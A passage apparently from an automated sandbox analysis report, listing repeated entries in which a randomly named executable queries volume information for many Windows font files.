          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
